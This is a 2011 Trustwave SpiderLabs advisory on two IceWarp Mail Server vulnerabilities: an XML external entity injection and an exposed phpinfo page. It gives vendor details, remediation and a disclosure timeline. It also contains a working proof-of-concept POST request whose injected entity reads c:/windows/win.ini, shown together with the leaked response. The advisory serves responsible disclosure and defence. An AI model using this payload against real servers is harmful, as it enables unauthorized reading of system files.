IceWarp Mail Server Injection / Information Disclosure

`Trustwave's SpiderLabs Security Advisory TWSL2011-013:  
Multiple Vulnerabilities in IceWarp Mail Server  
  
https://www.trustwave.com/spiderlabs/advisories/TWSL2011-013.txt  
  
Published: 2011-09-23  
Version: 1.0  
  
Vendor: IceWarp (http://www.icewarp.com)  
Product: IceWarp Mail Server  
Version affected: 10.3.2 and below  
  
Product description: IceWarp WebMail is the web front-end for the IceWarp  
Mail Server, which provides email access on over 50,000 servers. IceWarp  
WebMail provides web-based access to email, calendars, contacts, files  
and shared data from any computer with a browser and Internet connection.  
  
Credit: David Kirkpatrick of Trustwave's SpiderLabs  
  
Finding 1: XML External Entity Injection  
CVE: CVE-2011-3579  
  
An external entity is a function of the XML specification which allows XML  
documents to reference resources external to the XML document. This  
functionality forces the XML parser of the application to access the  
resource specified.  
  
In this case it is possible to inject an XML DOCTYPE "SYSTEM" directive to  
access local files on the operating system where the IceWarp server is  
installed. Using this technique it is possible to retrieve readable files  
on the operating system. This attack can also be used to create a possible  
denial of service condition.  
  
Proof-of-Concept:  
  
The following POST request was sent to the host A.B.C.D where the IceWarp  
mail server was running:  
  
REQUEST  
=========  
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1  
Host:A.B.C.D User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0)  
Gecko/20100101 Firefox/5.0  
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language:en-gb,en;q=0.5i've  
Accept-Encoding: gzip, deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Proxy-Connection: keep-alive  
Referer: http://A.B.C.D  
Content-Length: 249  
Content-Type: application/xml;charset=UTF-8  
Pragma: no-cache  
Cache-Control: no-cache  
  
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq  
type="set"><query  
xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c  
6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffc  
d2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method><  
/query></iq>  
  
RESPONSE:  
==========  
HTTP/1.1 200 OK  
Server: IceWarp/9.4.2  
Date: Wed, 20 Jul 2011 10:04:56 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control:no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0 Pragma: no-cache  
Content-Type: text/xml  
Vary: Accept-Encoding  
Content-Length: 1113  
  
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error  
uid="login_invalid">test; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1  
....TRUNCATED  
  
The above proof-of-concept would retrieve the c:\windows\win.ini file (the  
response in this example has been truncated).  
  
  
Finding 2: PHP Information Disclosure  
CVE: CVE-2011-3580  
  
It is possible to retrieve the PHP information file phpinfo() by accessing  
the following URL http://A.B.C.D/server where A.B.C.D is the IP of the  
server running the IceWarp software. The response will be a page detailing  
the PHP version used and the configuration settings of PHP, including  
system details.  
  
  
Vendor Response: These issues have been addressed as of version 10.3.3  
  
Remediation Steps: Customers should update to the latest version of IceWarp  
Mail Server in order to address these issues. The above issues have been  
corrected in version 10.3.3.  
  
Revision History:  
08/03/11 - Vulnerability disclosed  
09/19/11 - Patch released  
09/23/11 - Advisory published  
  
  
About Trustwave: Trustwave is the leading provider of on-demand and  
subscription-based information security and payment card industry  
compliance management solutions to businesses and government entities  
throughout the world. For organizations faced with today's challenging  
data security and compliance environment, Trustwave provides a unique  
approach with comprehensive solutions that include its flagship  
TrustKeeper compliance management software and other proprietary security  
solutions. Trustwave has helped thousands of organizations--ranging from  
Fortune 500 businesses and large financial institutions to small and  
medium-sized retailers--manage compliance and secure their network  
infrastructure, data communications and critical information assets.  
Trustwave is headquartered in Chicago with offices throughout North  
America, South America, Europe, Africa, China and Australia. For more  
information, visit https://www.trustwave.com  
  
About Trustwave's SpiderLabs: SpiderLabs is the advance security team at  
Trustwave responsible for incident response and forensics, ethical hacking  
and application security tests for Trustwave's clients. SpiderLabs has  
responded to hundreds of security incidents, performed thousands of ethical  
hacking exercises and tested the security of hundreds of business  
applications for Fortune 500 organizations. For more information visit  
https://www.trustwave.com/spiderlabs  
  
Disclaimer: The information provided in this advisory is provided "as is"  
without warranty of any kind. Trustwave disclaims all warranties, either  
express or implied, including the warranties of merchantability and fitness  
for a particular purpose. In no event shall Trustwave or its suppliers be  
liable for any damages whatsoever including direct, indirect, incidental,  
consequential, loss of business profits or special damages, even if  
Trustwave or its suppliers have been advised of the possibility of such  
damages. Some states do not allow the exclusion or limitation of liability  
for consequential or incidental damages so the foregoing limitation may not  
apply.  
  
  
  
  
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.  
  
`